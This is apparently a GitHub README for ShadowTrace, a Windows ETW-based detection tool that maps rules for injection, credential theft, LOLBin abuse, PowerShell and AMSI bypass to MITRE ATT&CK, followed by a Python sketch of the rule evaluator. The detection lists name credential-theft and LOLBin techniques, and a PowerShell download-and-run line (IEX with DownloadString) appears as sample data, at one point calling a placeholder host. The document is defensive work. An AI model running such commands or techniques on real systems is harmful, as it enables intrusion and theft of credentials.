mazen91111/ShadowTrace

GitHub: mazen91111/ShadowTrace

ETW-based real-time threat detection system for Windows, covering process injection, credential theft, LOLBin abuse, PowerShell attacks and AMSI bypass, with each detection mapped to the MITRE ATT&CK framework.

Stars: 0 | Forks: 0

# 👁️ ShadowTrace — ETW Real-Time Threat Detection System

```
╔════════════════════════════════════════════════════════════════╗
║  ShadowTrace — ETW Real-Time Threat Detection                  ║
║  Process · DNS · PowerShell · AMSI · LOLBins · Credentials     ║
║  Author: mazen91111 (parasite911) · Blue/Red Team              ║
╚════════════════════════════════════════════════════════════════╝
```

## 🎯 Detection Rules (mapped to MITRE ATT&CK)

| Rule | MITRE ID | Severity | Description |
|---|---|---|---|
| Remote thread injection | T1055.003 | 🔴 Critical | CreateRemoteThread into a foreign process |
| Process hollowing | T1055.012 | 🔴 Critical | NtUnmapViewOfSection + WriteProcessMemory |
| APC queue injection | T1055.004 | 🟠 High | QueueUserAPC targeting a remote thread |
| LSASS memory access | T1003.001 | 🔴 Critical | Process reading lsass.exe memory |
| SAM hive access | T1003.002 | 🟠 High | Direct access to the SAM/SECURITY registry hives |
| LOLBin execution | T1218 | 🟠 High | mshta, certutil, rundll32, etc. |
| Encoded PowerShell | T1059.001 | 🟠 High | -EncodedCommand, IEX, DownloadString |
| AMSI bypass | T1562.001 | 🔴 Critical | AmsiScanBuffer patching attempt |
| Registry persistence | T1547.001 | 🟡 Medium | Run key modification |
| Scheduled task | T1053.005 | 🟡 Medium | schtasks /create used for persistence |
| DNS exfiltration | T1048.003 | 🟠 High | High-entropy / long DNS subdomains |

## 📡 Monitored ETW Providers

| Provider | Events |
|---|---|
| Kernel-Process | ProcessStart, ProcessStop, ImageLoad |
| Kernel-File | FileCreate, FileDelete |
| DNS-Client | DNSQuery, DNSResponse |
| PowerShell | ScriptBlockLog, CommandInvocation |
| AMSI | AMSIScan, AMSIResult |
| Security-Auditing | Logon, PrivilegeUse |
| Sysmon | ProcessCreate, NetworkConnect, RegistryEvent |

## 🚀 Installation

```
git clone https://github.com/mazen91111/ShadowTrace.git
cd ShadowTrace
pip install -r requirements.txt
```

## 🧪 Usage

```
# Start real-time threat monitoring (simulated)
python shadowtrace.py --monitor

# List all detection rules with their MITRE IDs
python shadowtrace.py --list-rules

# List ETW providers and their GUIDs
python shadowtrace.py --list-providers

# Monitor for 30 seconds
python shadowtrace.py --monitor --duration 30
```

## 📸 Sample Output

```
══════════════════════════════════════════════════════════════════════════
  👁️ ShadowTrace — Real-Time Threat Monitor
══════════════════════════════════════════════════════════════════════════

[ LIVE EVENT STREAM ]
──────────────────────────────────────────────────────────────────────
▐ 14:23:05.12 [CRITICAL]
▐ ⚠ Process Injection — Remote Thread Creation
▐ MITRE: T1055.003 │ PID: 892 │ svchost.exe
▐ SourcePID: 4812 → TargetPID: 892 (CreateRemoteThread)
▐ Matched: CreateRemoteThread
──────────────────────────────────────────────────────────────────────
▐ 14:23:05.55 [HIGH]
▐ ⚠ Suspicious PowerShell — Encoded Command
▐ MITRE: T1059.001 │ PID: 4812 │ powershell.exe
▐ ScriptBlock: IEX (New-Object Net.WebClient).DownloadString(...)
▐ Matched: IEX, Net.WebClient, DownloadString
──────────────────────────────────────────────────────────────────────

══════════════════════════════════════════════════════════════════════════
  👁️ ShadowTrace — Threat Detection Summary
══════════════════════════════════════════════════════════════════════════
  Events Analyzed  : 10
  Alerts Triggered : 8

[ SEVERITY BREAKDOWN ]
  CRITICAL [█████████░░░░░░░░░░░░░░░░░░░░░] 3
  HIGH     [████████████░░░░░░░░░░░░░░░░░░] 4
  MEDIUM   [███░░░░░░░░░░░░░░░░░░░░░░░░░░░] 1

[ MITRE ATT&CK COVERAGE ]
  T1003.001 ●  (1 alert)
  T1055.003 ●  (1 alert)
  T1059.001 ●● (2 alerts)
  T1218     ●● (2 alerts)
  T1562.001 ●  (1 alert)
```

## 👤 Author

**Mazen Obed** — [@mazen91111](https://github.com/mazen91111)
*Threat Detection | Windows Internals | Blue & Red Team*

## ⚠️ Disclaimer

## 📄 License

MIT License
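The rule table above describes matches on ETW event fields (remote thread source/target PIDs, LOLBin image names, PowerShell script-block indicators, long or high-entropy DNS labels) and a severity summary. The following is an added illustration of that rule-to-MITRE mapping as a small Python evaluator run over a constructed event stream; it is not ShadowTrace's own code, and the event dict shape, rule thresholds (30-character / 3.5-bit DNS label) and sample events are assumptions.

```python
import math
import ntpath
from collections import Counter

# Constructed rule data mirroring the README's table (not ShadowTrace's own code).
PS_INDICATORS = ("-EncodedCommand", "IEX", "Net.WebClient", "DownloadString")
LOLBINS = {"mshta.exe", "certutil.exe", "rundll32.exe"}

def shannon_entropy(s):
    """Bits per character; random-looking DNS labels score high (4.0 max for 16 symbols)."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())

def evaluate(event):
    """Map one ETW-style event dict to an alert dict, or None when no rule matches."""
    kind = event.get("type")
    if kind == "RemoteThread" and event["SourcePID"] != event["TargetPID"]:
        return {"rule": "Remote thread injection", "mitre": "T1055.003", "severity": "CRITICAL"}
    if kind == "ProcessStart" and ntpath.basename(event["image"]).lower() in LOLBINS:
        return {"rule": "LOLBin execution", "mitre": "T1218", "severity": "HIGH"}
    if kind == "ScriptBlockLog":
        hits = [i for i in PS_INDICATORS if i.lower() in event["script"].lower()]
        if hits:
            return {"rule": "Suspicious PowerShell", "mitre": "T1059.001", "severity": "HIGH", "matched": hits}
    if kind == "DNSQuery":
        label = event["name"].split(".")[0]  # leftmost label is where tunnelled data lands
        if len(label) >= 30 or shannon_entropy(label) > 3.5:  # assumed thresholds
            return {"rule": "DNS exfiltration", "mitre": "T1048.003", "severity": "HIGH"}
    return None

def run(events):
    """Evaluate every event; return (alerts, severity breakdown) like the README summary."""
    alerts = [a for a in map(evaluate, events) if a]
    return alerts, Counter(a["severity"] for a in alerts)

# Constructed sample stream modelled on the README's example output.
SAMPLE_EVENTS = [
    {"type": "RemoteThread", "SourcePID": 4812, "TargetPID": 892},
    {"type": "ScriptBlockLog", "script": "IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/p')"},
    {"type": "ProcessStart", "image": r"C:\Windows\System32\mshta.exe"},
    {"type": "ProcessStart", "image": r"C:\Windows\System32\notepad.exe"},
    {"type": "DNSQuery", "name": "a3f9c1e7b2d4056f8e1a9c3b7d2f4e6a.example.invalid"},
    {"type": "DNSQuery", "name": "www.example.invalid"},
]

if __name__ == "__main__":
    for alert in run(SAMPLE_EVENTS)[0]:
        print(f"[{alert['severity']}] {alert['rule']} ({alert['mitre']})")
```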